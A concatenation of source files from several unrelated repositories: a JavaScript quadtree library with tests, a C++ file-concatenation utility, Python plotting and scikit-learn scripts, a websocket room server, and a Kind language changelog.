unEmptyLeaves.forEach(function (subleaf) {
expect(subleaf.items.length).toBeGreaterThan(0);
});
});
describe('unEmptyLeaves.items length should match getItems.length', function () {
var leaf = new Leaf(props);
leaf.addItem({ x: 0, y: 0, val: 'A' });
leaf.addItem({ x: 1, y: 0, val: 'B' });
leaf.addItem({ x: 1, y: 1, val: 'C' });
leaf.addItem({ x: 0, y: 1, val: 'D' });
leaf.addItem({ x: 0.125, y: 0.125, val: 'E' });
leaf.addItem({ x: 0.126, y: 0.126, val: 'F' });
leaf.addItem({ x: 0.127, y: 0.127, val: 'G' });
leaf.addItem({ x: 0.1252, y: 0.1252, val: 'H' });
leaf.addItem({ x: 0.1252, y: 0.1252, val: 'I' });
leaf.addItem({ x: 0.1252, y: 0.1253, val: 'J' });
leaf.addItem({ x: 0.12511, y: 0.12511, val: 'K' });
leaf.addItem({ x: 0.12512, y: 0.12512, val: 'L' });
leaf.addItem({ x: 0.12513, y: 0.12513, val: 'M' });
var unEmptyLeaves = leaf.getUnEmptyLeaves();
// We should have 11 unempty leaves with the above setup
expect(unEmptyLeaves.length).toBe(7);
var allItems = leaf.getItems();
// We should have 13 items in the tree
expect(allItems.length).toBe(13);
var subleaf_items = [];
unEmptyLeaves.forEach(function (subleaf) {
// Every unempty leaf should have more than 1 item
expect(subleaf.items.length).toBeGreaterThan(0);
subleaf_items = subleaf_items.concat(subleaf.items);
});
// Sum of items in unempty leaves should equal sum of items using getItems()
expect(subleaf_items.length).toEqual(allItems.length);
}, 400);
describe('Adding items should return the item added', function () {
var leaf = new Leaf(props);
var item = leaf.addItem({ x: 0, y: 0, val: 'A' });
expect(item.val).toBe('A');
var item = leaf.addItem({ x: 1, y: 0, val: 'B' });
expect(item.val).toBe('B');
var item = leaf.addItem({ x: 1, y: 1, val: 'C' });
expect(item.val).toBe('C');
var item = leaf.addItem({ x: 0, y: 1, val: 'D' });
expect(item.val).toBe('D');
var item = leaf.addItem({ x: 0.125, y: 0.125, val: 'E' });
expect(item.val).toBe('E');
var item = leaf.addItem({ x: 0.126, y: 0.126, val: 'F' });
expect(item.val).toBe('F');
var item = leaf.addItem({ x: 0.127, y: 0.127, val: 'G' });
expect(item.val).toBe('G');
var item = leaf.addItem({ x: 0.1252, y: 0.1252, val: 'H' });
expect(item.val).toBe('H');
var item = leaf.addItem({ x: 0.1252, y: 0.1252, val: 'I' });
expect(item.val).toBe('I');
var item = leaf.addItem({ x: 0.1252, y: 0.1253, val: 'J' });
expect(item.val).toBe('J');
var item = leaf.addItem({ x: 0.12511, y: 0.12511, val: 'K' });
expect(item.val).toBe('K');
var item = leaf.addItem({ x: 0.12512, y: 0.12512, val: 'L' });
expect(item.val).toBe('L');
var item = leaf.addItem({ x: 0.12513, y: 0.12513, val: 'M' });
expect(item.val).toBe('M');
});
describe('Should have correct number of leaves after removing item', function () {
var leaf = new Leaf(props);
leaf.addItem({ x: 0, y: 0, val: 'A' });
leaf.addItem({ x: 1, y: 0, val: 'B' });
leaf.addItem({ x: 1, y: 1, val: 'C' });
leaf.addItem({ x: 0, y: 1, val: 'D' });
// Adding this item causes a split resulting in 4 unempty leaves
var lastAddeditem = leaf.addItem({ x: 0.125, y: 0.125, val: 'E' });
expect(leaf.getUnEmptyLeaves().length).toBe(4);
// Removing the last added item should collapse the parent leaf, recalculating
// the subitems...
lastAddeditem.remove();
// ... now we should be back down to 1 leaf.
expect(leaf.getUnEmptyLeaves().length).toBe(1);
});
describe('Honestly havn\'t really thought this test through, lucky if it\s accurate', function () {
var leaf = new Leaf(props);
var item1 = leaf.addItem({ x: 0, y: 0, val: 'A' });
var item2 = leaf.addItem({ x: 1, y: 0, val: 'B' });
leaf.addItem({ x: 1, y: 1, val: 'C' });
leaf.addItem({ x: 0, y: 1, val: 'D' });
leaf.addItem({ x: 0.125, y: 0.125, val: 'E' });
leaf.addItem({ x: 0.126, y: 0.126, val: 'F' });
leaf.addItem({ x: 0.127, y: 0.127, val: 'G' });
leaf.addItem({ x: 0.1252, y: 0.1252, val: 'H' });
leaf.addItem({ x: 0.1252, y: 0.1252, val: 'I' });
leaf.addItem({ x: 0.1252, y: 0.1253, val: 'J' });
leaf.addItem({ x: 0.12511, y: 0.12511, val: 'K' });
leaf.addItem({ x: 0.12512, y: 0.12512, val: 'L' });
leaf.addItem({ x: 0.12513, y: 0.12513, val: 'M' });
expect(leaf.getUnEmptyLeaves().length).toBe(7);
item1.remove();
item2.remove();
expect(leaf.getUnEmptyLeaves().length).toBe(6);
});
test.run();
// rosevelt work hard at work wirth doign (parks rec, work with people you love)
<file_sep>/leaf.js
/**
* Carlton Quadtree
* - A Quad Tree implementation in ESNext
* - <NAME> (f1lt3r)
* - MIT License
*
* Demos: http://f1lt3r.github.io/carlton-quadtree
*
* Example:
*
* const myLeaf = new Leaf({
* bounds: {
* top: 0,
* right: 0,
* bottom: 0,
* left: 0
* }
* })
*
* myLeaf.addItem({
* x:0, y:0, val: 123
* })
*
* console.log(myLeaf.getItems())
*/
let leafCount = 0
let itemCount = 0
const isInBounds = (item, bounds) => {
if (item.x >= bounds.left &&
item.x < bounds.right &&
item.y >= bounds.top &&
item.y < bounds.bottom) {
return true
}
return false
}
const shuffle = (items, leaves) => {
items.forEach(subitem => {
leaves.forEach(subleaf => {
if (isInBounds(subitem, subleaf.bounds)) {
subleaf.addItem(subitem)
return false
}
})
})
}
const place = (item, leaves) => {
let subleaf
for (let i = 0; i < 4; i += 1) {
subleaf = leaves[i]
if (isInBounds(item, subleaf.bounds)) {
return subleaf.addItem(item)
}
}
}
const validLeaf = props => {
if (props === undefined) {
return false
}
if (!props.bounds) {
return false
}
if (Reflect.has(props, 'bounds')) {
if (!Reflect.has(props.bounds, 'top') ||
!Reflect.has(props.bounds, 'left') ||
!Reflect.has(props.bounds, 'bottom') ||
!Reflect.has(props.bounds, 'right')) {
return false
}
}
return true
}
const validItem = item => {
if (item === undefined) {
return false
}
if ((typeof item).toString() === 'object') {
if (!Reflect.has(item, 'x') ||
!Reflect.has(item, 'y') ||
!Reflect.has(item, 'val')) {
return false
}
}
return true
}
class Item {
constructor(item, leaf) {
itemCount += 1
this.uid = itemCount
this.index = leaf.items.push(item) - 1
item.items = leaf.items
item.leaf = leaf
item.remove = () => {
leaf.items.splice(this.index, 1)
leaf.parent.collapse()
}
return item
}
}
class Leaf {
constructor(props) {
this.valid = validLeaf(props)
if (!this.valid) {
return
}
leafCount += 1
this.bounds = props.bounds
this.depth = props.depth + 1 || 0
this.uid = leafCount
this.leaves = []
this.items = []
this.parent = props.parent || {root: true}
}
getItems() {
if (this.items.length > 0) {
return this.items
}
if (this.leaves.length > 0) {
return this.leaves[0].getItems()
.concat(
this.leaves[1].getItems(),
this.leaves[2].getItems(),
this.leaves[3].getItems())
}
return []
}
getUnEmptyLeaves() {
if (this.items.length > 0) {
return [this]
}
if (this.leaves.length > 0) {
return this.leaves[0].getUnEmptyLeaves()
.concat(
this.leaves[1].getUnEmptyLeaves(),
this.leaves[2].getUnEmptyLeaves(),
this.leaves[3].getUnEmptyLeaves())
}
return []
}
addItem(item) {
if (!validItem(item)) {
return {
valid: false
}
}
if (this.leaves.length > 0) {
return place(item, this.leaves)
}
if (this.items.length < 4) {
return new Item(item, this)
}
if (this.items.length === 4) {
split(this)
shuffle(this.items, this.leaves)
this.items = []
return place(item, this.leaves)
}
}
collapse() {
const subitems = this.getItems()
this.leaves = []
for (let i = 0, l = subitems.length; i < l; i++) {
this.addItem(subitems[i])
}
}
}
const split = leaf => {
const midX = leaf.bounds.left +
((leaf.bounds.right - leaf.bounds.left) / 2)
const midY = leaf.bounds.top +
((leaf.bounds.bottom - leaf.bounds.top) / 2)
const subBoundsTopLeft = {
top: leaf.bounds.top,
left: leaf.bounds.left,
right: midX,
bottom: midY
}
const subBoundsTopRight = {
top: leaf.bounds.top,
left: midX,
right: leaf.bounds.right,
bottom: midY
}
const subBoundsBottomRight = {
top: midY,
left: midX,
right: leaf.bounds.right,
bottom: leaf.bounds.bottom
}
const subBoundsBottomLeft = {
top: midY,
left: leaf.bounds.left,
right: midX,
bottom: leaf.bounds.bottom
}
leaf.leaves.push(
new Leaf({
bounds: subBoundsTopLeft,
depth: leaf.depth, parent: leaf
}),
new Leaf({
bounds: subBoundsTopRight,
depth: leaf.depth, parent: leaf
}),
new Leaf({
bounds: subBoundsBottomRight,
depth: leaf.depth, parent: leaf
}),
new Leaf({
bounds: subBoundsBottomLeft,
depth: leaf.depth, parent: leaf
})
)
}
// Constructor export depends on environment
if (typeof module === 'undefined') {
window.Leaf = Leaf
} else {
module.exports = Leaf
}
<file_sep>/README.md
# Carlton Quadtree
An infinitely divisible QuadTree implementation in ESNext.

[](https://f1lt3r.github.io/carlton-quadtree/examples/example-01.html)
[](https://f1lt3r.github.io/carlton-quadtree/examples/example-02.html)
[](https://f1lt3r.github.io/carlton-quadtree/examples/example-03.html)
[](https://f1lt3r.github.io/carlton-quadtree/examples/example-04.html)
[](https://f1lt3r.github.io/carlton-quadtree/examples/example-05.html)
[](https://f1lt3r.github.io/carlton-quadtree/examples/example-06.html)
[](https://f1lt3r.github.io/carlton-quadtree/examples/example-07.html)
[](https://f1lt3r.github.io/carlton-quadtree/examples/example-08.html)
[](https://f1lt3r.github.io/carlton-quadtree/examples/example-09.html)
[](https://f1lt3r.github.io/carlton-quadtree/examples/example-10.html)
[](https://f1lt3r.github.io/carlton-quadtree/examples/example-11.html)
<file_sep>/test-runner.js
var tests = []
, begunTests = false
, current_test = null
, failures = 0
;
function expect (expect) {
var assert = {
expected: expect
};
current_test.asserts.push(assert);
return {
// Type check ===
toBe: function (actual) {
assert.actual = actual;
assert.type = "toBe";
if (expect === actual) {
return pass(assert);
}
if (expect !== actual) {
return fail(assert);
}
},
// Truthy check ==
toEqual: function (actual) {
assert.actual = actual;
assert.type = "toEqual";
if (expect == actual) {
return pass(assert);
}
if (expect != actual) {
return fail(assert);
}
},
toBeGreaterThan: function (actual) {
assert.actual = actual;
assert.type = "toBeGreaterThan";
if (expect > actual) {
return pass(assert);
}
if (expect <= actual) {
return fail(assert);
}
},
}
}
// hi
// :) love you
function pass () {
// console.log('.');
return true;
}
function fail (assert) {
failures += 1;
console.log('Fail: "'+(current_test.desc)+'",');
console.log('\tExpected: '+('('+(typeof assert.expected)+') "'+assert.expected)+'" ' +
assert.type+': '+('('+(typeof assert.actual)+') "'+assert.actual)+'"');
return false;
}
function failTimeout (elapsed) {
failures += 1;
console.log('Fail: "'+current_test.desc+'",');
console.log('\tTimeout expected: < '+current_test.timeout + ' ms, Actual: '+elapsed+' ms.');
return false;
}
function describe (should, callback, ms) {
tests.push({
desc: should,
spec: callback,
asserts: [],
timeout: ms
});
if (begunTests) {
runTests();
}
}
function runTests () {
// overwrite describe for inner tests (maybe not a great idea)
describe = function (should, callback, ms) {
var start = + new Date();
(function (spec) {
spec();
}) (callback);
var now = + new Date()
, elapsed = now - start
;
if (ms) {
if (elapsed > ms) {
failTimeout(elapsed);
}
}
}
var startTests = + new Date();
tests.forEach(function (test) {
current_test = test;
var start = + new Date();
(function (spec) {
spec();
}) (test.spec);
var now = + new Date()
, elapsed = now - start
;
if (test.timeout) {
if (elapsed > test.timeout) {
failTimeout(elapsed);
}
}
});
var endTests = + new Date()
, elapsed = endTests - startTests
;
if (failures === 0) {
console.log('All Tests pass in ' +(elapsed/1000) + ' seconds.');
}
}
module.exports = {
describe: describe,
expect: expect,
run: runTests,
};
// describe('Tests should work', function () {
// expect(1).toBe(1);
// expect(2).toBe(2);
// expect(3).toBe(3);
// expect(4).toBe(4);
// });
// describe('Tests should fail', function () {
// expect('').toEqual(0);
// });
|
1904f1107ac52c325b2d4be5e9f747b60f891f02
|
[
"JavaScript",
"Markdown"
] | 4
|
JavaScript
|
F1LT3R/carlton-quadtree
|
ae26befef23b193fb7509529f09b22fd6aa9b0db
|
d91ea592dc31ae37cacb0243e42444f31ad04604
|
refs/heads/master
|
<repo_name>SomeChars/Cpp-Repository<file_sep>/ConsoleApplication7.cpp
#include "pch.h"
#include <iostream>
#include <string.h>
void read_vvod(int args,char *vvod[]);
char str[100];
char **lib = (char**)malloc(100*sizeof(char*));
char **lib_begin = lib;
int counter = 0;
FILE* filetowrite;
int main(int argc,char *argv[])
{
if (!strcmp(argv[1], "HELP")) {
printf("***List of commands*** -n:Numeration, -b:Numeration without spaces, -E:$ before string, -s:Trim all repeats, -T:Tabulation shown like ^|, -p:Just print, -+:Associate files into a file that goes last");
}
else
{
read_vvod(argc,argv);
}
}
void read_vvod(int args,char *vvod[]) {
int counter = 0;
int count_origin_strings = 0;
int count = 0;
int trimmed_counter = 0;
int flag = 0;
if (!strcmp(vvod[1], "-+")) {
filetowrite = fopen(vvod[args - 1], "w");
}
for (int i = 2;i < args;i++) {
if (i == args - 1) {
if (!strcmp(vvod[1], "-+")) {
break;
}
}
FILE* file;
if (file = fopen(vvod[i], "r")) {
while (fgets(str, 100, file)) {
counter++;
if (!strcmp(vvod[1], "-n")) {
printf("%d %s", count, str);
count++;
}
if (!strcmp(vvod[1], "-b")) {
if (strcmp(str, "")) {
printf("%d %s", trimmed_counter, str);
trimmed_counter++;
}
else
{
printf("%s", str);
}
}
if (!strcmp(vvod[1], "-$")) {
printf("$ %s", str);
}
if (!strcmp(vvod[1], "-s")) {
counter++;
if (count_origin_strings > 100) {
lib = (char**) realloc(lib_begin,count_origin_strings*sizeof(char*));
}
for (int i = 0;i < count_origin_strings;i++) {
if (!strcmp(str, (*lib))) {
flag = 1;
}
*lib++;
}
if (!flag) {
printf("%s", str);
(*lib) = (char*)malloc(100 * sizeof(char));
strcpy((*lib), str);
count_origin_strings++;
}
flag = 0;
lib = lib_begin;
}
if (!strcmp(vvod[1], "-T")) {
char c1;
char c2;
int number_of_tabs = 0;
int flag = 0;
for (int j = 0; j < strlen(str) + number_of_tabs; j++) {
if (str[j] == '\t') {
number_of_tabs++;
str[j] = '^';
c2 = str[j + 1];
str[j + 1] = '|';
for (int k = j + 2; k < strlen(str) + number_of_tabs;k++) {
if (flag % 2 == 0) {
c1 = str[k];
str[k] = c2;
}
else
{
c2 = str[k];
str[k] = c1;
}
flag++;
}
flag = 0;
}
}
printf("%s", str);
}
if (!strcmp(vvod[1], "-p")) {
printf(str);
}
if (!strcmp(vvod[1], "-+")) {
fprintf(filetowrite, str);
}
}
}
else {
printf("%s %s\n","No file with this path:", vvod[i]);
}
}
}
<file_sep>/FundVisual.py
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.ticker
import numpy as np
capital = {'MSK':[],'SPB':[]}
crisis = {'MSK':[],'SPB':[]}
dates = []
file1 = open("F:Data.txt", "r")
for line in (file1):
a = [i for i in line.split(' ')]
if str(a[1]) not in capital:
capital[str(a[1])] = []
capital[str(a[1])] += [float(a[2])]
if str(a[1]) not in crisis:
crisis[str(a[1])] = []
crisis[str(a[1])] += [float(a[3])]
if a[0] not in dates:
dates.append(a[0])
dates.pop()
fig = plt.figure()
ax1 = fig.add_subplot(111)
for i in capital:
ax1.plot(capital[i])
ax1.set_xlabel('Date')
ax1.set_ylabel('Capital')
ax1.legend([city for city in capital],loc = 'center right')
ax1.set_title('Vizualization')
plt.xticks(np.arange(len(dates)),dates)
ax1.grid(True)
fig = plt.figure()
ax2 = fig.add_subplot(111)
for i in crisis:
ax2.plot(crisis[i])
ax2.set_xlabel('Date')
ax2.set_ylabel('Crisis')
ax2.legend([city for city in crisis],loc = 'center right')
ax2.set_title('Vizualization')
plt.xticks(np.arange(len(dates)),dates)
ax2.grid(True)
plt.show()
#df = pd.DataFrame('Date','City','Capital','Crisis')
|
e213424052c556842539a172a183d7b42bbc423d
|
[
"Python",
"C++"
] | 2
|
C++
|
SomeChars/Cpp-Repository
|
1e48249c746bc98ac9cef817178663c3f1d1bbe5
|
fbe64fb2ab9e08cb391846475429b342b87b1499
|
refs/heads/master
|
<repo_name>amruthakm98/firstproject<file_sep>/regression.py
import numpy as np
from sklearn import linear_model, datasets, tree
import matplotlib.pyplot as plt
#%matplotlib inline
number_of_samples = 100
x = np.linspace(-np.pi, np.pi, number_of_samples)
y = 0.5*x+np.sin(x)+np.random.random(x.shape)
plt.scatter(x,y,color='black') #Plot y-vs-x in dots
plt.xlabel('x-input feature')
plt.ylabel('y-target values')
plt.title('Fig 1: Data for linear regression')
plt.show()
random_indices = np.random.permutation(number_of_samples)
#Training set
x_train = x[random_indices[:70]]
y_train = y[random_indices[:70]]
#Validation set
x_val = x[random_indices[70:85]]
y_val = y[random_indices[70:85]]
#Test set
x_test = x[random_indices[85:]]
y_test = y[random_indices[85:]]
model = linear_model.LinearRegression() #Create a least squared error linear regression object
#sklearn takes the inputs as matrices. Hence we reshpae the arrays into column matrices
x_train_for_line_fitting = np.matrix(x_train.reshape(len(x_train),1))
y_train_for_line_fitting = np.matrix(y_train.reshape(len(y_train),1))
#Fit the line to the training data
model.fit(x_train_for_line_fitting, y_train_for_line_fitting)
#Plot the line
plt.scatter(x_train, y_train, color='black')
plt.plot(x.reshape((len(x),1)),model.predict(x.reshape((len(x),1))),color='blue')
plt.xlabel('x-input feature')
plt.ylabel('y-target values')
plt.title('Fig 2: Line fit to training data')
plt.show()
mean_val_error = np.mean( (y_val - model.predict(x_val.reshape(len(x_val),1)))**2 )
mean_test_error = np.mean( (y_test - model.predict(x_test.reshape(len(x_test),1)))**2 )
print ('Validation MSE: ', mean_val_error, '\nTest MSE: ', mean_test_error)
#******************************CLASSIFICATION**********************************
iris = datasets.load_iris()
X = iris.data[:,:2] #Choosing only the first two input-features
Y = iris.target
#The first 50 samples are class 0 and the next 50 samples are class 1
X = X[:100]
Y = Y[:100]
number_of_samples = len(Y)
#Splitting into training, validation and test sets
random_indices = np.random.permutation(number_of_samples)
#Training set
num_training_samples = int(number_of_samples*0.7)
x_train = X[random_indices[:num_training_samples]]
y_train = Y[random_indices[:num_training_samples]]
#Validation set
num_validation_samples = int(number_of_samples*0.15)
x_val = X[random_indices[num_training_samples : num_training_samples+num_validation_samples]]
y_val = Y[random_indices[num_training_samples: num_training_samples+num_validation_samples]]
#Test set
num_test_samples = int(number_of_samples*0.15)
x_test = X[random_indices[-num_test_samples:]]
y_test = Y[random_indices[-num_test_samples:]]
#Visualizing the training data
X_class0 = np.asmatrix([x_train[i] for i in range(len(x_train)) if y_train[i]==0]) #Picking only the first two classes
Y_class0 = np.zeros((X_class0.shape[0]),dtype=np.int)
X_class1 = np.asmatrix([x_train[i] for i in range(len(x_train)) if y_train[i]==1])
Y_class1 = np.ones((X_class1.shape[0]),dtype=np.int)
plt.scatter(X_class0[:,0], X_class0[:,1],color='red')
plt.scatter(X_class1[:,0], X_class1[:,1],color='blue')
plt.xlabel('sepal length')
plt.ylabel('sepal width')
plt.legend(['class 0','class 1'])
plt.title('Fig 3: Visualization of training data')
plt.show()
<file_sep>/stockreg.py
import pandas as pd
import quandl
#&api_key=<KEY>
df=quandl.get("SSE/GGQ1")
print(df.head())
<file_sep>/iris.py
import numpy as np
from sklearn import linear_model, datasets
import matplotlib.pyplot as plt
#1. Prepare data (use iris dataset)
iris = datasets.load_iris()
X = iris.data[:, :2] #choosing only the first 2 input features
Y = iris.target
#The first 50 samples are class 0 and the next 50 samples are class 1
X = X[:100]
Y = Y[:100]
number_of_samples = len(Y)
#Splitting into training, validation and test sets:
random_indices = np.random.permutation(number_of_samples)
#Training set:
num_training_samples = int(number_of_samples*0.7)
x_train = X[random_indices[:num_training_samples]]
y_train = Y[random_indices[:num_training_samples]]
#Validation set:
num_validation_samples = int(number_of_samples*0.15)
x_val = X[random_indices[num_training_samples:num_training_samples+num_validation_samples]]
y_val = Y[random_indices[num_training_samples:num_training_samples+num_validation_samples]]
#Test set:
num_test_samples = int(number_of_samples*0.15)
x_test = X[random_indices[-num_test_samples:]]
y_test = Y[random_indices[-num_test_samples:]]
#Visualizing the training data:
X_class_0 = np.asmatrix([x_train[i] for i in range(len(x_train)) if y_train[i] == 0])
Y_class_0 = np.zeros((X_class_0.shape[0]), dtype=np.int)
X_class_1 = np.asmatrix([x_train[i] for i in range(len(x_train)) if y_train[i] == 1])
Y_class_1 = np.ones((X_class_1.shape[0]), dtype=np.int)
plt.scatter([X_class_0[:, 0]],[X_class_0[:, 1]], edgecolors='red')
plt.scatter([X_class_1[:, 0]],[X_class_1[:, 1]], edgecolors='blue')
plt.xlabel('sepal length')
plt.ylabel('sepal width')
plt.legend(['class 0', 'class 1'])
plt.title('Fig 1 : Visualization of the training data')
plt.show()
#2. Fit the logistic regression model:
model = linear_model.LogisticRegression(C=1e5) #C is the inverse of the regularization factor
full_X = np.concatenate((X_class_0, X_class_1), axis=0)
full_Y = np.concatenate((Y_class_0, Y_class_1), axis=0)
model.fit(full_X, full_Y)
#Display the decision boundary
#Visualization code taken from : http://scikit-learn.org
#For plotting the decision boundary, we will assign a color to each point in the mesh:
h = 0.2 #step size in the mesh
x_min, x_max = full_X[:, 0].min() - .5, full_X[:, 0].max() + .5
y_min, y_max = full_X[:, 1].min() - .5, full_X[:, 1].max() + .5
xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))
#predict for the entire mesh to find the regions for each class
Z = model.predict(np.c_[xx.ravel(), yy.ravel()])
#Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.figure()
plt.pcolormesh(xx, yy, Z, cmap = plt.cm.Paired)
#Plot also the training points:
plt.scatter([X_class_0[:, 0]],[X_class_0[:, 1]], c='red', edgecolors='k', cmap=plt.cm.Paired)
plt.scatter([X_class_1[:, 0]],[X_class_1[:, 1]], c='blue', edgecolors='k', cmap=plt.cm.Paired)
plt.xlabel('sepal length')
plt.ylabel('sepal width')
plt.title('Fig 1 : Visualization of the decision boundary')
plt.xlim(xx.min(), xx.max())
plt.ylim(yy.min(), yy.max())
plt.show()
#4. Evaluate the model:
validation_set_predictions = [model.predict(x_val[i].reshape((1,2)))[0] for i in range(x_val.shape[0])]
validation_misclassification_percentage = 0
for i in range(len(validation_set_predictions)):
if validation_set_predictions[i] != y_val[i]:
validation_misclassification_percentage += 1
validation_misclassification_percentage *= 100/len(y_val)
print("Validation misclassification precentage = ", validation_misclassification_percentage, "%")
test_set_predictions = [model.predict(x_test[i].reshape((1,2)))[0] for i in range(x_test.shape[0])]
test_misclassification_percentage = 0
for i in range(len(test_set_predictions)):
if test_set_predictions[i] != y_test[i]:
test_misclassification_percentage += 1
test_misclassification_percentage *= 100/len(y_test)
print("Test misclassification precentage = ", test_misclassification_percentage, "%")
|
a535cf185cfc07a96b174c8f749b6b60c6906139
|
[
"Python"
] | 3
|
Python
|
amruthakm98/firstproject
|
95cd146713474840dd2a51338b6a77273d5bace2
|
c45b74dfaca6421bbdbc2fab8274e3c6f44fb64f
|
refs/heads/master
|
<repo_name>Kix205/Kind<file_sep>/web/events/server.js
var port = Number(process.argv[2] || "7171");
var ws = require('ws');
var fs = require("fs-extra");
var path = require("path");
var lib = require("./lib.js");
var ethsig = require("nano-ethereum-signer");
// Globals
// =======
var RoomPosts = {}; // Map RoomID [Uint8Array] -- past messages to sync w/ room
var Watchlist = {}; // Map RoomID [WsPeer] -- ws peers watching given room
var Connected = 0;
// Startup
// =======
// Creates the data directory
if (!fs.existsSync("data")) {
fs.mkdirSync("data");
}
// Loads existing posts
var files = fs.readdirSync("data");
for (var file of files) {
if (file.slice(-5) === ".room") {
var room_name = file.slice(0, -5);
var file_data = fs.readFileSync(path.join("data",file));
var room_posts = [];
for (var i = 0; i < file_data.length; i += 4 + size) {
var size = lib.hex_to_u32(file_data.slice(i, i + 4).toString("hex"));
var head = Buffer.from([lib.SHOW]);
var body = file_data.slice(i + 4, i + 4 + size);
room_posts.push(new Uint8Array(Buffer.concat([head, body])));
}
console.log("Loaded "+room_posts.length+" posts on room "+room_name+".");
RoomPosts[room_name] = room_posts;
}
}
// Methods
// =======
// Returns current time
function get_time() {
return Date.now();
}
// Returns current tick
function get_tick() {
return Math.floor(Date.now() / 62.5);
}
// Adds a user to a room's watchlist
function watch_room(room_name, ws) {
// Creates watcher list
if (!Watchlist[room_name]) {
Watchlist[room_name] = [];
}
// Gets watcher list
var watchlist = Watchlist[room_name];
// Makes sure user isn't watching already
for (var i = 0; i < watchlist.length; ++i) {
if (watchlist[i] === ws) {
return;
};
}
// Sends old messages
if (RoomPosts[room_name]) {
for (var i = 0; i < RoomPosts[room_name].length; ++i) {
ws.send(RoomPosts[room_name][i]);
}
}
// Adds user to watcher list
watchlist.push(ws);
};
// Removes a user from a room's watchlist
function unwatch_room(room_name, ws) {
// Gets watcher list
var watchlist = Watchlist[room_name] || [];
// Removes user from watcher list
for (var i = 0; i < watchlist.length; ++i) {
if (watchlist[i] === ws) {
for (var j = i; j < watchlist.length - 1; ++j) {
watchlist[j] = watchlist[j + 1];
};
return;
}
};
};
// Saves a post (room id, user address, data)
function save_post(post_room, post_user, post_data) {
var post_room = lib.check_hex(64, post_room);
var post_tick = lib.u64_to_hex(get_tick());
var post_user = lib.check_hex(160, post_user);
var post_data = lib.check_hex(null, post_data);
var post_list = [post_room, post_tick, post_user, post_data];
var post_buff = lib.hexs_to_bytes([lib.u8_to_hex(lib.SHOW)].concat(post_list));
var post_seri = lib.hexs_to_bytes([lib.u32_to_hex(post_buff.length-1)].concat(post_list));
var post_file = path.join("data", post_room+".room");
var log_msg = "";
log_msg += "Saving post!\n";
log_msg += "- post_room: " + post_room + "\n";
log_msg += "- post_user: " + post_user + "\n";
log_msg += "- post_data: " + post_data + "\n";
log_msg += "- post_file: " + post_room+".room" + "\n";
// Creates reconnection array for this room
if (!RoomPosts[post_room]) {
RoomPosts[post_room] = [];
}
// Adds post to reconnection array
RoomPosts[post_room].push(post_buff);
// Broadcasts
if (Watchlist[post_room]) {
log_msg += "- broadcasting to " + Watchlist[post_room].length + " watcher(s).\n";
for (var ws of Watchlist[post_room]) {
ws.send(post_buff);
}
}
// Create file for this room
if (!fs.existsSync(post_file)) {
fs.closeSync(fs.openSync(post_file, "w"));
}
// Adds post to file
fs.appendFileSync(post_file, Buffer.from(post_seri));
// Log messages
console.log(log_msg);
};
// TCP API
// =======
const wss = new ws.Server({port});
wss.binaryType = "arraybuffer";
wss.on("connection", function connection(ws) {
console.log("["+(++Connected)+" connected]");
ws.on("message", function incoming(data) {
var msge = new Uint8Array(data);
switch (msge[0]) {
// User wants to watch a room
case lib.WATCH:
var room = lib.bytes_to_hex(msge.slice(1, 9));
watch_room(room, ws);
break;
// User wants to unwatch a room
case lib.UNWATCH:
var room = lib.bytes_to_hex(msge.slice(1, 9));
unwatch_room(room, ws);
break;
// User wants to know the time
case lib.TIME:
var msge_buff = lib.hexs_to_bytes([
lib.u8_to_hex(lib.TIME),
lib.u64_to_hex(Date.now()),
lib.bytes_to_hex(msge.slice(1, 9)),
]);
ws.send(msge_buff);
break;
// User wants to post a message
case lib.POST:
var post_room = lib.bytes_to_hex(msge.slice(1, 9));
var post_data = lib.bytes_to_hex(msge.slice(9, msge.length - 65));
var post_sign = lib.bytes_to_hex(msge.slice(msge.length - 65, msge.length));
var post_hash = ethsig.keccak("0x"+lib.hexs_to_bytes([post_room, post_data])).slice(2);
var post_user = ethsig.signerAddress("0x"+post_hash, "0x"+post_sign).slice(2);
save_post(post_room, post_user, post_data);
break;
};
});
ws.on("close", function() {
for (var room_name in Watchlist) {
Watchlist[room_name] = Watchlist[room_name].filter(watcher => watcher !== ws);
};
console.log("["+(--Connected)+" connected]");
});
});
console.log("Started server on ws://localhost:"+port+".");
<file_sep>/CHANGELOG.md
## Kind 1.0.108
- Allow "for" to be on the left side of a list comprehension
[for x in [0 to 10] where Nat.is_even(x): x * 2]
## Kind 1.0.104
- Implicit arguments are here!
```
id<A: $Type>(x: A): A
x
explicit: Nat
id<$Nat>(7)
implicit: Nat
id(7)
```
- Nullary function call can be used instead of `!`
```
let a = Map.new!
let b = Map.new()
```
This is helpful, because implicit arguments only trigger on calls.
## Kind 1.0.101
- Mutter syntax and improvements on the getter/setter syntax.
Now you can get/set deeply nested fields. For example, `list[0][0]` works and
returns a `Maybe`, and `list[0][0] <- 7` works as expected. Moreover, the `<=`
syntax can now be used to apply a function to the focused field. Example:
```
type Bar {
new(map: Map<List<List<Nat>>>)
}
type Foo {
new(bar: Bar)
}
Test: Maybe<Nat>
// Creates a value
let a = Foo.new(Bar.new({"list": [[1,2,3],[4,5,6],[7,8,9]]}))
// Applies a function to a nested element
let a = a@bar@map{"list"}[0][0] <= Nat.mul(10)
// Gets a nested element
a@bar@map{"list"}[0][0]
```
### Kind 1.0.91
- Forall now demands `->`
- Now you can assign types in lambda parameters as in
```
Test: _
(x: Nat, y) x + y
```
### Kind 1.0.85
- Optimize BBT.for
### Kind 1.0.81
- Add Scheme compilation options to CLI
### Kind 1.0.79
- Socket UDP primitives
Check Example.udp.sender and Example.udp.receiver
### Kind 1.0.75
- New syntaxes
- Use
use x = obj
rest
// Equivalent to:
let x = obj
open x
rest
- Let abort
let x = maybe abort k
rest
// Equivalent to:
case maybe as x {
none: k
some:
let x = x.value
rest
}
// Also works with 'use'
- List comprehension
[x * 10 for x in [1, 2, 3]]
// Returns:
[10, 20, 30]
- Map for-in:
for key:val in map with state:
loop
rest
let state = for key:val in map:
loop
rest
- Function composition:
f . g
// Equivalent to:
Function.comp!!!(f, g)
### Kind 1.0.64
- Monadic block improvements
- Now it accepts most outside notations (let, open, log, for, etc.)
- When you use a "for" without a "with", it becomes a monadic loop:
IO {
for i from 0 to 10:
IO.print(Nat.show(i))
for i from 100 to 110:
IO.print(Nat.show(i))
}
### Kind 1.0.63
- Generic derivers: stringifier, parser, serializer, deserializer. Example:
```
type MyType {
foo(n: List<Nat>, s: String, m: MyType)
bar
